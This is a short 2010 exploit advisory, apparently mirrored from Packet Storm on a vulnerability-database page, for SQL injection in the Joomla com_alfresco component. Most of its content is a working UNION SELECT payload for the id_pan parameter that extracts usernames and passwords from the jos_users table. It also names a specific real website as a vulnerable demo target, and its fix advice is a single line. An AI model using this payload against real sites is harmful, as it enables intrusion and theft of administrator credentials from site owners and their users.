Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFl0riXPACKETSTORM:84661
HistoryJan 04, 2010 - 12:00 a.m.

Joomla Alfresco SQL Injection

2010-01-0400:00:00
Fl0riX
packetstormsecurity.com
24
JSON
`  
<------------------- header data start ------------------- >  
  
#############################################################  
# Joomla Component com_alfresco SQL Injection Vulnerability   
#############################################################  
  
# Author : FL0RiX  
  
# Name : com_alfresco  
  
# Greez : PyskE,Dr.Kacak And All Friends  
  
# Bug Type : SQL Injection  
  
# Infection : Admin login bilgileri alinabilir.  
  
# Demo Vuln. :  
  
http://www.fincaterraqua.com/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]  
  
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--  
  
< -- bug code end of -- >   
_________________________________________________________________  
Windows Live Hotmail: Arkadaþlarýnýz Facebook'taki güncellemelerinizi doðrudan Hotmail®'den alýr.  
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009`
JSON